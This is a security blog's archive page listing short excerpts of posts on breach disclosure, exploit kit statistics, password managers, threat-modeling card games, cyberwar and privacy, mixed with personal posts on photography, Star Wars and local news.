So Flickr has launched a new redesign, and it’s crowded, jumbled and slow. Now on Flickr with its overlays, its fade-ins and loads, it’s unmoving side and top bars, Flickr’s design takes center stage, elbowing aside the photos that I’m there to see. So I’m looking for a new community site where the photo I […]

 

Workshop on the Economics of Information Security

The next Workshop on the Economics of Information Security will be held June 11-12 at Georgetown University, Washington, D.C. Many of the papers look fascinating, including “On the Viability of Using Liability to Incentivise Internet Security”, “A Behavioral Investigation of the FlipIt Game”, and “Are They Actually Any Different? Comparing 3,422 Financial Institutions’ Privacy Practices.” […]

 

TrustZone and Security Usability

Cem Paya has a really thought-provoking set of blog posts on “TrustZone, TEE and the delusion of security indicators” (part 1, part 2“.) Cem makes the point that all the crypto and execution protection magic that ARM is building is limited by the question of what the human holding the phone thinks is going on. […]

 

3D-printed guns and the crypto wars

So there’s a working set of plans for the “Liberator.” It’s a working firearm you can print on a 3d printer. You can no longer get the files from the authors, whose site states: “DEFCAD files are being removed from public access at the request of the US Department of Defense Trade Controls. Until further […]

 

The Onion and Breach Disclosure

There’s an important and interesting new breach disclosure that came out yesterdau. It demonstrates leadership by clearly explaining what happened and offering up lessons learned. In particular: It shows the actual phishing emails It talks about how the attackers persisted their takeover by sending a fake “reset your password” email (more on this below) It […]

 

Security Lessons From Star Wars: Breach Response

To celebrate Star Wars Day, I want to talk about the central information security failure that drives Episode IV: the theft of the plans. First, we’re talking about really persistent threats. Not like this persistence, but the “many Bothans died to bring us this information” sort of persistence. Until members of Comment Crew are going […]

 

The Plateau Effect

The Plateau Effect is a powerful law of nature that affects everyone. Learn to identify plateaus and break through any stagnancy in your life— from diet and exercise, to work, to relationships. The Plateau Effect shows how athletes, scientists, therapists, companies, and musicians around the world are learning to break through their plateaus—to turn off […]

 

A Quintet of Facebook Privacy Stories

It’s common to hear that Facebook use means that privacy is over, or no longer matters. I think that perception is deeply wrong. It’s based in the superficial notion that people making different or perhaps surprising privacy tradeoffs are never aware of what they’re doing, or that they have no regrets. Some recent stories that […]

 

Weekend Photography

An amazing shot by Philipp Schmidli of a cyclist in front of the moon. PetaPixel explains the work involved in getting that shot in “Silhouettes in a Giant Moonrise, Captured Using a 1200mm Lens.” (Thanks to Bob Blakely). Also in the realm of impressive tool use is this: Orangutan from Borneo photographed using a spear […]

 

The Psychology of Password Managers

As I think more about the way people are likely to use a password manager, I think there’s real problems with the way master passwords are set up. As I write this, I’m deeply aware that I’m risking going into a space of “it’s logical that” without proper evidence. Let’s start from the way most […]

 

The Breach Trilogy: Assume, Confirm, Discuss

We’ve been hearing for several years that we should assume breach. Many people have taken this to heart (although today’s DBIR still says it’s still months to detect those breaches). I’d like to propose (predict?) that breach as a central concept will move through phases. Each of these phases will go through a hype cycle, […]

 

The best part of exploit kits

Following up on my post on exploit kit statistics (no data? really folks?), I wanted to share a bit of a head-shaker for a Friday with way too much serious stuff going on. Sometimes, researchers obscure all the information, such as this screenshot. I have no idea who these folks think they’re protecting by destroying […]

 

1Password & Hashcat

The folks at Hashcat have some interesting observations about 1Password. The folks at 1Password have a response, and I think there’s all sorts of fascinating lessons here. The crypto conversations are interesting, but at the end of the day, a lot of security is unavoidably contributed by the master password strength. I’d like to offer […]

 

Exploit Kit Statistics

On a fairly regular basis, I come across pages like this one from SANS, which contain fascinating information taken from exploit kit control panels: There’s all sorts of interesting numbers in that picture. For example, the success rate for owning XP machines (19.61%) is three times that of Windows 7. (As an aside, the XP […]

 

Celebrating 5 Years of New School: 40% off!

Thanks to Addison Wesley, who are offering 40% off the book. Apply code NEWSCHOOL40 to get your discounted copy. (You apply the code after proceeding to checkout.)

 

By looking for evidence first, the Brits do it right

As it happens, both the US Government and the UK government are leading “cyber security standards framework” initiatives right now.  The US is using a consensus process to “incorporate existing consensus-based standards to the fullest extent possible”, including “cybersecurity standards, guidelines, frameworks, and best practices” and “conformity assessment programs”. In contrast, the UK is asking […]

 

5 Years of New School

Five years ago Friday was the official publication date of The New School of Information Security. I want to take this opportunity to look back a little and look forward to the next few years. Five years ago, fear of a breach and its consequences was nearly universal, and few people thought anything but pain […]

 

I swear, I'm just looking at the articles!

Apparently, Playboy (possibly NSFW) has an app on iTunes. However, to get an app through the censors prudes “appropriate content” editors, there’s none of Playboy’s trademark nudes. There hasn’t been such good news for their writers since the braille edition. I’ll leave the jokes to you. It’s worth thinking about this as the sanitized future […]

 

Analyzing The Army's Accidental Test

According to Wired, “Army Practices Poor Data Hygiene on Its New Smartphones, Tablets.” And I think that’s awesome. No, really, not the ironic sort of awesome, but the awesome sort of awesome, because what the Army is doing is a large scale natural experiment in “does it matter?” Over the next n months, the Pentagon’s […]

 

AdaCamp: San Francisco June 8-9

(Posted for friends) AdaCamp is a conference dedicated to increasing women’s participation in open technology and culture: open source software, Wikipedia-related projects, open data, open geo, fan fiction, remix culture, and more. The conference will be held June 8 and 9th in San Francisco. There will be two tracks at the conference: one for people […]

 

Hacking Humans at BlackHat

Hacking humans is an important step in today’s exploitation chains. From “2011 Recruitment plan.xls” to instant messenger URL delivery at the start of Aurora, the human in the loop is being exploited just as much as the machine. In fact, with the right story, you might not even need an exploit at all. So I’m […]

 

Bicycling & Risk

While everyone else is talking about APT, I want to talk about risk thinking versus outcome thinking. I have a lot of colleagues who I respect who like to think about risk in some fascinating ways. For example, there’s the Risk Hose and SIRA folks. I’m inspired by To Encourage Biking, Cities Lose the Helmets: […]

 

MD5s, IPs and Ultra

So I was listening to the Shmoocon presentation on information sharing, and there was a great deal of discussion of how sharing too much information could reveal to an attacker that they’d been detected. I’ve discussed this problem a bit in “The High Price of the Silence of Cyberwar,” but wanted to talk more about […]

 

New School Thinking At Davos

This week I have experienced an echo of this pattern at the 2013 WEF meeting. But this time my unease does not revolve around any financial threats, but another issue – cyber security. … [The] crucial point is this: even if some companies are on top of the issue, others are not, and without more […]

 

The Death Star: An Inside Job?

Here’s a Friday Star Wars video for you. As Austin Hill tweeted, “Conspiracy revealed! 7 min video that will change the way you think about one of the important events of our lifetime”

 

On Cookie Blocking

It would not be surprising if an article like “Firefox Cookie-Block Is The First Step Toward A Better Tomorrow” was written by a privacy advocate. And it may well have been. But this privacy advocate is also a former chairman of the Internet Advertising Bureau. (For their current position, see “Randall Rothenberg’s Statement Opposing Mozilla’s […]

 

New paper: "How Bad Is It? — A Branching Activity Model for Breach Impact Estimation"

Adam just posted a question about CEO “willingness to pay” (WTP) to avoid bad publicity regarding a breach event.  As it happens, we just submitted a paper to Workshop on the Economics of Information Security (WEIS) that proposes a breach impact estimation method that might apply to Adam’s question.  We use the WTP approach in a […]

 

Paying for Privacy: Enterprise Breach Edition

We all know how companies don’t want to be named after a breach. Here’s a random question: how much is that worth to a CEO? What would a given organization be willing to pay to keep its name out of the press? (A-priori, with at best a prediction of how the press will react.) Please […]

 

Lunar Oribter Image Recovery Project

The Lunar Orbiter Image Recovery Project needs help to recover data from the Lunar Orbiter spacecraft. Frankly, it’s a bit of a disgrace that Congress funds, well, all sorts of things, over this element of our history, but that’s besides the point. Do I want to get angry, or do I want to see this […]

 

Army Calhamer to Heaven

Allan Calhamer, the inventor of the game Diplomacy, has passed away. The NYTimes has an obituary.

 

Gamifying Driving

…the new points system rates the driver’s ability to pilot the MINI with a sporty yet steady hand. Praise is given to particularly sprightly sprints, precise gear changes, controlled braking, smooth cornering and U-turns executed at well-judged speeds. For example, the system awards maximum Experience Points for upshifts carried out within the ideal rev range […]

 

Security Blogger Awards

The Security Bloggers Awards were this week at RSA! Congratulations to Naked Security (best corporate blog), Paul DotCom (best podcast), Krebs on Security (Most educational, best represents the security industry), J4VV4D’s blog (most entertaining), Andy Greenberg’s “Meet The Hackers Who Sell Spies The Tools To Crack Your PC (And Get Paid Six-Figure Fees)” and Jack […]

 

2013 PET Award for Outstanding Research in Privacy Enhancing Technologies

You are invited to submit nominations to the 2013 PET Award. The PET Award is presented annually to researchers who have made an outstanding contribution to the theory, design, implementation, or deployment of privacy enhancing technology. It is awarded at the annual Privacy Enhancing Technologies Symposium (PETS). The PET Award carries a prize of 3000 […]

 

How to Ask Good Questions at RSA

So this week is RSA, and I wanted to offer up some advice on how to engage. I’ve already posted my “BlackHat Best Practices/Survival kit. First, if you want to ask great questions, pay attention. There are things more annoying than a question that was answered while the questioner was tweeting, but you still don’t […]

 

Is there "Room for Debate?" in Breach Disclosure?

The New York Times has a “Room for Debate” on “Should Companies Tell Us When They Get Hacked?” It currently has 4 entries, 3 of which are dramatically in favor of more disclosure. I’m personally fond of Lee Tien’s “ We Need Better Notification Laws.” My personal preference is of course (ahem) fascinating to you, […]

 

HIPAA's New Breach Rules

Law firm Proskauer has published a client alert that “HHS Issues HIPAA/HITECH Omnibus Final Rule Ushering in Significant Changes to Existing Regulations.” Most interesting to me was the breach notice section: Section 13402 of the HITECH Act requires covered entities to provide notification to affected individuals and to the Secretary of HHS following the discovery […]

 

New School Blog Attacked with 0day

We were hacked again. The vuln used was 0day, and has now been patched, thanks to David Mortman and Matt Johansen, and the theme has also been updated, thanks to Rodrigo Galindez. Since we believe in practicing the transparency we preach, I wanted to discuss what happened and some options we considered. Let me dispense […]

 

Guns, Homicides and Data

I came across a fascinating post at Jon Udell’s blog, “Homicide rates in context ,” which starts out with this graph of 2007 data: Jon’s post says more than I care to on this subject right now, and points out questions worth asking. As I said in my post on “Thoughts on the Tragedies of […]

 

HHS & Breach Disclosure

There’s good analysis at “HHS breach investigations badly backlogged, leaving us in the dark” To say that I am frequently frustrated by HHS’s “breach tool” would be an understatement. Their reporting form and coding often makes it impossible to know – simply by looking at their entries – what type of breach occurred. Consider this […]

 

New York Times gets Pwned, Responds all New School

So there’s a New York Times front page story on how “Hackers in China Attacked The Times for Last 4 Months.” I just listened to the NPR story with Nicole Perlroth, who closed out saying: “Of course, no company wants to come forward and voluntarily say `hey we were hacked by China, here’s how it […]

 

Breach Analysis: Data Source biases

Bob Rudis has an fascinating and important post “Once More Into The [PRC Aggregated] Breaches.” In it, he delves into the various data sources that the Privacy Rights Clearinghouse is tracking. In doing so, he makes a strong case that data source matters, or as Obi-Wan said, “Luke, you’re going to find that many of […]

 

Happy Data Privacy Day! Go check out PrivacyFix

It’s Data Privacy Day, and there may be a profusion of platitudes. But I think what we need on data privacy day are more tools to let people take control of their privacy. One way to do that is to check your privacy settings. Of course, the way settings are arranged changes over time, and […]

 

Why the Star Wars Prequels Sucked

It is a truism that the Star Wars prequels sucked. (Elsewhere, I’ve commented that the franchise being sold to Disney means someone can finally tell the tragic story of Anakin Skywalker’s seduction by the dark side.) But the issue of exactly why they sucked is complex and layered, and most of us prefer not to […]

 

Privacy and Health Care

In my post on gun control and schools, I asserted that “I worry that reducing privacy around mental health care is going to deter people who need health care from getting it.” However, I didn’t offer up any evidence for that claim. So I’d like to follow up with some details from a report that […]

 

"Cyber" Insurance and an Opportunity

There’s a fascinating article on PropertyCasualty360 “ As Cyber Coverage Soars, Opportunity Clicks” (thanks to Jake Kouns and Chris Walsh for the pointer). I don’t have a huge amount to add, but wanted to draw attention to some excerpts that drew my attention: Parisi observes that pricing has also become more consistent over the past […]

 

Thoughts on the Tragedies of December 14th

I started this post on December 14th, and couldn’t finish it. I’m going to leave the opening as I wrote it then: By now, everyone has heard of the tragic school shooting in Connecticut. My heart goes out to everyone touched by the events. But this isn’t the first school shooting on a December 14th. […]

 

“The Phoenix Project” may be uncomfortable

The Phoenix Project as an important new novel, and it’s worth reading if you work in technology. As I read it, I was awfully uncomfortable with one of the characters, John. John is the information security officer in the company, and, to be frank, John does not come off well at the start of the […]

 

On Disclosure of Intrusion Events in a Cyberwar

[This guest article is by thegruq. I’ve taken the liberty of HTML-ifying it from his original, http://pastie.org/5673568.] On Disclosure of Intrusion Events in a Cyberwar The Nation State’s guide to STFU In a cyberwar (such as the ongoing events on the Internet), all actors are motivated to remain silent about incidents that they detect. However, […]

 

Giant Rubber Ducks

There’s a giant rubber duck in Sydney Harbor right now: It’s apparently by Florentijn Hofman, who does this sort of thing. My only other comment? Seattle, you’re doing it wrong. Where’s our rubber duckie? Via “Sydney Festival Launches Giant Rubber Duck in the Harbor“, Pedestrian TV. (I believe there’s a typo, and the duck is […]

 

The High Price of the Silence of Cyberwar

A little ways back, I was arguing [discussing cyberwar] with thegrugq, who said “[Cyberwar] by it’s very nature is defined by acts of espionage, where all sides are motivated to keep incidents secret.” I don’t agree that all sides are obviously motivated to keep incidents secret, and I think that it’s worth asking, is there […]

 

Negative temperatures?

Absolute zero is often thought to be the coldest temperature possible. But now researchers show they can achieve even lower temperatures for a strange realm of “negative temperatures.” Oddly, another way to look at these negative temperatures is to consider them hotter than infinity, researchers added. (“Atoms Reach Record Temperature, Colder than Absolute Zero“, Charles […]

 

New School Thinking at the European Union

I was pretty excited to see this: An EU official said the aim of the report was to get companies to be more open about cyber attacks and help them fend off such disruption. “We want to change the culture around cyber security from one where people are sometimes afraid or ashamed to admit a […]

 
 

Elevation of Privilege: Drawing Developers into Threat Modeling

In the holiday spirit I wanted to share an academic-style paper on the Elevation of Privilege Threat Modeling card game (EoP_Whitepaper.pdf) The paper describes the motivation, experience and lessons learned in creating the game. As we’ve shared the game at conferences, we’ve seen people’s eyes light up at the idea of a game. We think […]

 

Information Security Risk: A Conversation with CSO

Earlier this month, I spoke with Derek Slater: In early 2008, Adam Shostack and Andrew Stewart released the book The New School of Information Security. And they launched a blog in support of the book and its message. I wondered about how Shostack perceives the state of IT risk management now, and whether he thinks […]

 

The Gavle Goat's Gone!

Gävlebocken har brunnit: Webbkamerabilder visade hur bocken snabbt blev övertänd och totalförstördes innan brandkåren hann fram. Or you can check the webcam: http://www.merjuligavle.se/Bocken/Bockenkamera/

 

The Fog of Reporting on Cyberwar

There’s a fascinating set of claims in Foreign Affairs “The Fog of Cyberward“: Our research shows that although warnings about cyberwarfare have become more severe, the actual magnitude and pace of attacks do not match popular perception. Only 20 of 124 active rivals — defined as the most conflict-prone pairs of states in the system […]

 

Can Science Improvise?

My friend Raquell Holmes is doing some really interesting work at using improv to unlock creativity. There’s some really interesting ties between the use of games and the use of improv to get people to approach problems in a new light, and I’m bummed that I won’t be able to make this event: Monday Dec […]

 

Infosec Lessons from Mario Batali's Kitchen

There was a story recently on NPR about kitchen waste, “No Simple Recipe For Weighing Food Waste At Mario Batali’s Lupa.” Now, normally, you’d think that a story on kitchen waste has nothing to do with information security, and you’d be right. But as I half listened to the story, I realized that it in […]

 

Hoff on AWS

Hoff’s blog post “Why Amazon Web Services (AWS) Is the Best Thing To Happen To Security & Why I Desperately Want It To Succeed” is great on a whole bunch of levels. If you haven’t read it, go do that. The first thing I appreciated is that he directly confronts the possibility of his own […]

 

The Gavle Goat is Getting Ready to Burn!

The Telegraph reports that the Gavle Goat for 2012 is up, and surrounded by guards, cameras, flame retardants, and arsonists. Emergent Chaos has reporters on the ground internet, ready to report on this holiday story of a town, a goat, and an international conspiracy of drunken arsonists. Stay tuned! This years goat is shown in […]

 

South Carolina

It’s easy to feel sympathy for the many folks impacted by the hacking of South Carolina’s Department of Revenue. With 3.6 million taxpayer social security numbers stolen, those people are the biggest victims, and I’ll come back to them. It’s also easy to feel sympathy for the folks in IT and IT management, all the […]

 

Control-Alt-Hack: Now available from Amazon!

Amazon now has copies of Control Alt Hack, the card game that I helped Tammy Denning and Yoshi Kohno create. Complimentary copies for academics and those who won copies at Blackhat are en route. From the website: Control-Alt-Hack™ is a tabletop card game about white hat hacking, based on game mechanics by gaming powerhouse Steve […]

 

Now Available: Control Alt Hack!

Amazon now has copies of Control Alt Hack, the card game that I helped Tammy Denning and Yoshi Kohno create. Complimentary copies for academics and those who won copies at Blackhat are en route. From the website: Control-Alt-Hack™ is a tabletop card game about white hat hacking, based on game mechanics by gaming powerhouse Steve […]

 

Email Security Myths

My buddy Curt Hopkins is writing about the Patraeus case, and asked: I wonder, in addition to ‘it’s safe if it’s in the draft folder,’ how many additional technically- and legally-useless bits of sympathetic magic that people regularly use in the belief that it will save them from intrusion or discovery, either based on the […]

 

The Questions Not Asked on Passwords

So there’s a pair of stories on choosing good passwords on the New York Times. The first is (as I write this) the most emailed story on the site, “How to Devise Passwords That Drive Hackers Away.” It quotes both Paul Kocher and Jeremiah Grossman, both of whom I respect. There’s also a follow-on story, […]

 

The "Human Action" argument is not even wrong

Several commenters on my post yesterday have put forth some form of the argument that hackers are humans, humans are unpredictable, and therefore, information security cannot have a Nate Silver. This is a distraction, as a moment’s reflection will show. Muggings, rapes and murders all depend on the actions of unpredictable humans, and we can, […]

 

Where is Information Security's Nate Silver?

So by now everyone knows that Nate Silver predicted 50 out of 50 states in the 2012 election. Michael Cosentino has a great picture: Actually, he was one of many quants who predicted what was going to happen via meta-analysis of the data that was available. So here’s my question. Who’s making testable predictions of […]

 

Effective training: Wombat's USBGuru

Many times when computers are compromised, the compromise is stealthy. Take a moment to compare that to being attacked by a lion. There, the failure to notice the lion is right there, in your face. Assuming you survive, you’re going to relive that experience, and think about what you can learn from it. But in […]

 

Bleg: Canon & Apple RAW processing

I’m having a camera issue that’s become more and more noticeable with recent software changes. The raw previews coming out of the camera appear substantially more exposed than when Aperture is finished processing them. The difference is hard to measure (there’s no easy undo for raw processing), but appears to be about a full stop […]

 

Test post

Over the summer, Adam and I were talking and I said that I’d like a place to do some personal blogging as opposed to things I normally do, which are targeted at one place or another. I’d like to be able to blither about security, but also about whatever. Photography, cooking, you know, things that […]

 

Published Data Empowers

There’s a story over at Bloomberg, “Experian Customers Unsafe as Hackers Steal Credit Report Data.” And much as I enjoy picking on the credit reporting agencies, what I really want to talk about is how the story came to light. The cyberthieves broke into an employee’s computer in September 2011 and stole the password for […]

 

9.5 Theses on the Power and Efficacy of Gamification

Sebastian Deterding’s Microsoft research talk is now online: “9.5 Theses on the Power and Efficacy of Gamification“. You may recall that this talk inspired me to blog about “Running a game at work.” It’s worth an hour if you’re interested in serious games, persuasive games, or playful design.

 

I wish we had their problems

Ben Goldacre talks about how physicians are only getting data on tests that come out positive: I look forward to the day when infosec standards are set based on some tests or evidence, and we have to fight to extract more data. The talk is here: here.

 

Compliance Lessons from Lance, Redux

Not too long ago, I blogged about “Compliance Lessons from Lance.” And now, there seems to be dramatic evidence of a massive program to fool the compliance system. For example: Team doctors would “provide false declarations of medical need” to use cortisone, a steroid. When Armstrong had a positive corticosteroid test during the 1999 Tour […]

 

TSA Approach to Threat Modeling, Part 3

It’s often said that the TSA’s approach to threat modeling is to just prevent yesterday’s threats. Well, on Friday it came out that: So, here you see my flight information for my United flight from PHX to EWR. It is my understanding that this is similar to digital boarding passes issued by all U.S. Airlines; […]

 

Big Tex Burns

Something about this story just grabs me. I want to hear him saying “I am the dread pirate Roberts! I am here, but soon you will not be here!” Also, I’m sad that he wasn’t in Galve-ston. Photo by GreyChr

 

Proof of Age in UK Pilot

There’s a really interesting article by Toby Stevens at Computer Weekly, “Proof of age comes of age:” It’s therefore been fascinating to be part of a new initiative that seeks to address proof of age using a Privacy by Design approach to biometric technologies. Touch2id is an anonymous proof of age system that uses fingerprint […]

 

Running a Game at Work

Friday, I had the pleasure of seeing Sebastian Deterding speak on ‘9.5 Theses About Gamification.’ I don’t want to blog his entire talk, but one of his theses relates to “playful reframing”, and I think it says a lot to how to run a game at work, or a game tournament at a conference. In […]

 

The Boy Who Cried Cyber Pearl Harbor

There is, yet again, someone in the news talking about a cyber Pearl Harbor. I wanted to offer a few points of perspective. First, on December 6th, 1941, the United States was at peace. There were worries about the future, but no belief that a major attack was imminent, and certainly not a sneak attack. […]

 

Reporting Mistakes

In “New System for Patients to Report Medical Mistakes” the New York Times reports: The Obama administration wants consumers to report medical mistakes and unsafe practices by doctors, hospitals, pharmacists and others who provide treatment. Hospitals say they are receptive to the idea, despite concerns about malpractice liability and possible financial penalties for poor performance. […]

 

Choice Point Screening

Stamford Police said Jevene Wright, 29, created a fictitious company called “Choice Point Screening” and submitted false invoices for background checks that were submitted to Noble Americas Corporation, an energy retailer firm located in Stamford. (Patrick Barnard, “The Stamford (CT) Patch“) I don’t want to minimize the issue here. Assuming the allegations are correct, the […]

 

Follow your passion?

Growing up, we were told by guidance counselors, career advice books, the news media and others to “follow our passion.” This advice assumes that we all have a pre-existing passion waiting to be discovered. If we have the courage to discover this calling and to match it to our livelihood, the thinking goes, we’ll end […]

 

Two Models of Career Planning

There’s a fascinating interview with Mark Templeton of Citrix in the New York Times. It closes with the question of advice he gives to business students: There are two strategies for your life and career. One is paint-by-numbers and the other is connect-the-dots. I think most people remember their aunt who brought them a gift […]

 

Have you Run an Elevation of Privilege Tournament?

I got an email recently me asking if I had experience running an Elevation of Privilege tournament. I haven’t, and wanted to ask if anyone out there has done so, please share your experiences and suggestions One element that I thought about is a scoring system to help with the tournament’s goals. For examples, you […]

 

Systems Not Sith: Organizational Lessons From Star Wars

In Star Wars, the Empire is presented as a monolith. Storm Troopers, TIE Fighters and even Star Destroyers are supposedly just indistinguishable cogs in a massive military machine, single-mindedly pursuing a common goal. This is, of course, a façade – like all humans, the soldiers and Officers of the Imperial Military will each have their […]

 

Base Rate & Infosec

At SOURCE Seattle, I had the pleasure of seeing Jeff Lowder and Patrick Florer present on “The Base Rate Fallacy.” The talk was excellent, lining up the idea of the base rate fallacy, how and why it matters to infosec. What really struck me about this talk was that about a week before, I had […]

 

Lessons from Facebook's Stock Slide

So as Facebook continues to trade at a little over half of their market capitalization of 3 months ago, I think we can learn a few very interesting things. My goal here is not to pick on Facebook, but rather to see what we can take away and perhaps apply elsewhere. I think there are […]

 

What can we learn from the social engineering contest?

I was struck by the lead of Kelly Jackson Higgins’ article on the Defcon Social Engineering Contest: Walmart was the toughest nut to crack in last year’s social engineering competition at the DefCon hacker conference in Las Vegas, but what a difference a year makes: this year, the mega retailer scored the worst among the […]

 

Compliance Lessons from Lance

Recently, Lance Armstrong decided to forgo arbitration in his fight against the USADA over allegations of his use of certain performance enhancing drugs. His statement is “Full text of Armstrong statement regarding USADA arbitration.” What I found interesting about the story is the contrast between what might be termed a “compliance” mindset and a “you’re […]

 

SOURCE Seattle

I’ll be at SOURCE Seattle this week. I’m really excited to be speaking on “Security Lessons from Star Wars” at 10AM today.

 

Smashing the Future for Fun and Profit

I’d meant to post this at BlackHat. I think it’s worth sharing, even a bit later on: I’m excited to have be a part of a discussion with others who spoke at the first Blackhat: Bruce Schneier, Marcus Ranum, Jeff Moss, and Jennifer Granick. We’ve been asked to think about what the future holds, and […]

 

The Very Model of An Amateur Grammarian

I am the very model of an amateur grammarian I have a little knowledge and I am authoritarian But I make no apology for being doctrinarian We must not plummet to the verbal depths of the barbarian I’d sooner break my heart in two than sunder an infinitive And I’d disown my closest family within […]

 

One more request for help

If someone could suggest a specific way to make the blog title image work to bring you to the home page, that’d be most appreciated. Update, I think I fixed most of it. Thanks in particular to commenter “M”, who got me on the path to the fix, removing the inline CSS that the theme […]

 

Theme breakage, help?

The blog header image is repeating because of something in the stylesheets. I can’t see where the bug is. If someone can help out, I’d be much obliged. Expanded to add: It appears that there’s a computed “repeat” on the bg img which is the header, but why that repeat is being computed is unclear […]

 

Emergent Chaos: Romney/Ryan for America!

We here at Emergent Chaos have long been frustrated with the Obama Administration. Their failure to close Guantanamo, their failure to prosecute war crimes including torture, their choice to murder American citizens (never mind without due process), their invocation of the state secrets privilege, their persecution of whistleblowers, their TSA running rampant, the list of […]

 

Don't Share, Publish

I’d like to offer up a thought with regards to the latest swirl of discussion around ‘information sharing’ in security: Don’t share, publish. I want to talk about this because more and more folks are starting to question the value of information sharing frameworks and forums. Andrew and I share that skepticism in The New […]

 

Neil Armstrong, RIP

Neil Armstrong died August 25, aged 82. It’s difficult to properly memorialize this man, because, to a degree almost unheard of in our media-saturated times, he avoided the limelight. A statement by his family notes: As much as Neil cherished his privacy, he always appreciated the expressions of good will from people around the world […]

 

What story was that?

A friend is trying to track down a science fiction story in which the president had a death sentence at the end of their term. I know you’re all smart and good looking and at least one of you will know the exact author and title.

 

The Plural of Anecdote is Anecdotes

Over at Lexology.com, there’s a story which starts: Medical-data blackmail is becoming more common as more health care providers adopt electronic health records systems and store patient data digitally. (“Hackers demand ransom to keep medical records private“) The trouble with this opening sentence is that it has nothing to do with the story. It’s a […]

 

Regulations and Their Emergent Effects

There’s a fascinating story in the New York Times, “Profits on Carbon Credits Drive Output of a Harmful Gas“: [W]here the United Nations envisioned environmental reform, some manufacturers of gases used in air-conditioning and refrigeration saw a lucrative business opportunity. They quickly figured out that they could earn one carbon credit by eliminating one ton […]

 

New Species Discovered on Flickr

There’s a very cool story on NPR about “A New Species Discovered … On Flickr“. A entomologist was looking at some photos, and saw a bug he’d never seen. Check out the photographer’s site or Flickr pages. The paper is “A charismatic new species of green lacewing discovered in Malaysia (Neuroptera, Chrysopidae): the confluence of […]

 

Paul Ryan open thread

Oh, what the heck, it hasn’t been chaotic enough around here. So, I’ll give you a topic: Paul Ryan. Commentary from The Economist starts: IN THE polarised world of American politics, achieving bipartisan agreement on any topic is a rare feat nowadays. So perhaps it’s worth celebrating the fact that, had it been put to […]

 

The Problem With Pollution

National Geographic reports “Caffeinated Seas Found off U.S. Pacific Northwest.” The problem, of course, is salinity. They should totally be pumping that caffine into somewhere we can make good use of it.

 

Your career is over after a breach? Another Myth, Busted!

I’m a big fan of learning from our experiences around breaches. Claims like “your stock will fall”, or “your customers will flee” are shown to be false by statistical analysis, and I expect we’d see the same if we looked at people losing their jobs over breaches. (We could do this, for example, via LinkedIn […]

 

Fascinating Job at PayPal

Someone reached out to me about a job that looks really interesting: The Director of Security Experience, Education & Research (SEER) will be responsible for defining the customer-facing security strategy for PayPal , define product roadmaps to enhance feature security and usability, drive customer security best practices adoption throughout our industry, and drive customer security […]

 

An Argument Against Jargon

Lately I’ve been savoring Kahneman’s “Thinking, Fast and Slow”. Kahneman is one of the originators of behavioral economics and a Nobel prize winner. The book is tremendously thought provoking, insanely well written, jargon-minimizing, and just comes together beautifully. It’s a book where you struggle with the ideas and their implications, rather than struggle through the […]

 

My BlackHat Plans

I’ll be speaking twice at BlackHat. First on the “Smashing the Future” panel with Bruce Schneier, Marcus Ranum, Jeff Moss and Jennifer Granick (10AM Wednesday, main hall). My second talk is also on Wednesday, on a new game, Control-Alt-Hack. I’ve been helping Tamara Denning and Yoshi Kohno create Control-Alt-Hack, and we’ll be speaking Wednesday at […]

 

Aitel on Social Engineering

Yesterday, Dave Aitel wrote a fascinating article “Why you shouldn’t train employees for security awareness,” arguing that money spent on training employees about awareness is wasted. While I don’t agree with everything he wrote, I submit that your opinion on this (and mine) are irrelevant. The key question is “Is money spent on security awareness […]

 

Lives, Fortunes and Sacred Honor

Around the 4th of July, some smart, public minded folks put forth a “Declaration of Internet Freedom“. And while it’s good in a motherhood and apple pie sense of good, wholesome fun for the whole family, it lacks the punch and panache of the Declaration of Independence to which men pledged their lives, fortunes and […]

 

"Quartering large bodies of armed troops among us.."

So following up on our tradition of posting the Declaration of Independence from Great Britain on the 4th, I wanted to use one of those facts submitted to a candid world to comment on goings on in…Great Britain. There, the government has decided to place anti-aircraft missiles on the roof of a residential building near […]

 

The Evolution of Information Security

A little while back, a colleague at the NSA reached out to me for an article for their “Next Wave” journal, with a special topic of the science of information security. I’m pleased with the way the article and the entire issue came out, and so I’m glad that the NSA has decided to release […]

 

we mutually pledge to each other our Lives, our Fortunes and our sacred Honor

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

Taxpayers Stuck With Tab, but not in Seattle

In an article with absolutely no relevance for Seattle, the New York Times reports “With No Vote, Taxpayers Stuck With Tab on Bonds.” In another story to which Seattle residents should pay not attention, the city of Stockton is voting to declare bankruptcy, after risking taxpayer money on things like a … sports arena. Of […]

 

Will People Ever Pay for Privacy, Part XVI

Every now and then, a headline helps us see the answer to the question “Will people ever pay for Privacy?” Quoth the Paper of record: The seclusion may be the biggest selling point of the estate belonging to Robert Hurst, a former executive at Goldman Sachs, which was just listed by Debbie Loeffler of the […]

 

A flame about flame

CNET ran a truly ridiculous article last week titled “Flame can sabotage computers by deleting files, says Symantec”. And if that’s not goofy enough, the post opens with The virus can not only steal data but disrupt computers by removing critical files, says a Symantec researcher. ZOMG! A virus that deletes files! Now that is […]

 

Breach Notification in France

Over at the Proskauer blog, Cecile Martin writes “Is data breach notification compulsory under French law?” On May 28th, the Commission nationale de l’informatique et des libertés (“CNIL”), the French authority responsible for data privacy, published guidance on breach notification law affecting electronic communications service providers. The guidance was issued with reference to European Directive […]

 

Active Defense: Show me the Money!

Over the last few days, there’s been a lot of folks in my twitter feed talking about “active defense.” Since I can’t compress this into 140 characters, I wanted to comment quickly: show me the money. And if you can’t show me the money, show me the data. First, I’m unsure what’s actually meant by […]

 

Age and Perversity in Computer Security

I’ve observed a phenomenon in computer security: when you want something to be easy, it’s hard, and when you want the same thing to be hard, it’s easy. For example, hard drives fail at seemingly random, and it’s hard to recover data. When you want to destroy the data, it’s surprisingly hard. I call this […]

 

Future of Privacy Seeks Input

The Future of Privacy Forum (FPF) is an interesting mix of folks trying to help shape, well, the future of privacy. They have an interesting mix of academic and industry support, and a fair amount of influence. They’re inviting authors with an interest in privacy issues to submit papers to be considered for FPF’s third […]

 

In the Spirit of Feynman

Did you notice exactly how much of my post on Cloudflare was confirmation bias? Here, let me walk you through it. In our continuing series of disclosure doesn’t hurt, Continuing series are always dangerous, doubly so on blogs. I wanted to point out Cloudflare’s “Post Mortem: Today’s Attack; Apparent Google Apps/Gmail Vulnerability; and How to […]

 

Mozilla's Vegan BBQ

